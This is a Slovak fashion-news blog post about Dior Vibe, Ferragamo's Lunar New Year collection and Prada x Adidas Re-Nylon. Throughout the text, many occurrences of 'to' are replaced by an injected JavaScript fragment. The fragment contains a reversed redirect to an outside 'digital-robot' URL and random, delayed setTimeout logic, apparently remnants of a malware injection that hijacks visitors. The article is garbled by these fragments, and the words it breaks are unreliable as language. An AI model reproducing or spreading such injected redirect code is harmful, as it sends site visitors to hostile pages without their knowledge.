Novinky z módneho sveta

| február 15, 2022

Nový rok znamená predovšetkým nový začiatobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tok a tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to platí aj v módnom priemysle. Našťastie, rok 2022 sľubuje dávku optimizmu, a tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to najmä pokiaľ ide o štýl. Zostavili sme zoznam najočakávanejších módnych noviniek, spoluprác a trendov, na ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré sa môžeme v najbližšej dobe tešiť.

Dior Vibe Collection

Dior Vibe, najnovšia vízia kreatívnej riaditeľky francúzskeho domu Dior, Maria Grazia Chiuri debutobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovala kolekciou Cruise 2022, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá sa výrazne opiera o športobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tové oblečenie. Kolekcia pridáva aj úplne novú ponuku kabeliek: Bowling bag (“bowlingová taška”), inšpirovanú konštrukciou tenisiek. Retro tvar so sezónnymi zelenými potlačami Dior a gumeným povrchom s hviezdicovým reliéfom ako na podrážke tenisiek, aby bola nielen štýlová ale aj odolná a praktická.

Taška predstavuje skok do budúcnosti domu ako neustále sa meniacej značky, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá zahŕňa každý aspekt ženy, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá nosí Dior. Sprievodná kampaň vyzdvihuje odvážne atlétky vo viacerých disciplínach (vrátane somálskej boxerky Ramla Ali), ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré do kolekcie Vibe vnášajú odvážnu, športobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovú energiu. Zároveň téma perfektne korešponduje s novoročným duchom novoročných predsavzatí. Veď dostať sa “do kondície” v štýle Dior Vibe neznie až tak zle. Kolekcia je dostupná v predajniach a u predajcov Dior po celom svete a na dior.com.

Ferragamo Lunar New Year Collection

Práve počas čínskeho Nového roka návrhár Salvatobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tore Ferragamo oživuje ducha Tigra v spolupráci medzi značkou a čínskymi umelcami Sun Yuan a Peng Yu. Taška Studio Box a šatka od Ferragamo znázorňujú obrazce tigrov, na počesť jedinečného spojenia módy a umenia,  ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré Ferragamo podporovalo od svojho vzniku pred takmer 100 rokmi. Ponorte sa do energie tigra (odvahy a sily) a vyberte si napríklad oranžový kabát – šťastnú farbu tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tohtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to roka, prostredníctvom týchtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to krásne spracovaných doplnkov. Kolekcia je dostupná online na ferragamo.com a vo vybraných predajniach Ferragamo po celom svete.

Prada x Adidas Sustainable Nylon Capsule Collection

Prada a Adidas začínajú rok 2022 spoluprácou, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá myslí na budúcnosť našej planéty. Kolekcia Adidas for Prada Re-Nylon, pomenovaná po látke Prada Re-Nylon prepracovanej v rámci ikonickej textúry Adidas Originals Forum, ponúka špičkové športobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tové oblečenie, doplnky, tašky vyrobené v Taliansku z recyklovateľných materiálov. Súbežne so spustením kolekcie sa uskutobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toční aj slávnostná digitálna aktivácia, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá zákazníkov oboch značiek v jednom vesmíre. Neodmysliteľne inovatívny duch tejtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to najnovšej kolekcie má jedinečnú rolu prispôsobenú budúcnosti módy, pričom kladie dôraz na udržateľnosť. Kolekcia je dostupná v butikoch Prada po celom svete a online na prada.com a adidas.com/prada od 13. januára.

 

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: elle.com

Tags:

Category: HOMEPAGE, TRENDY & SHOPPING

Comments are closed.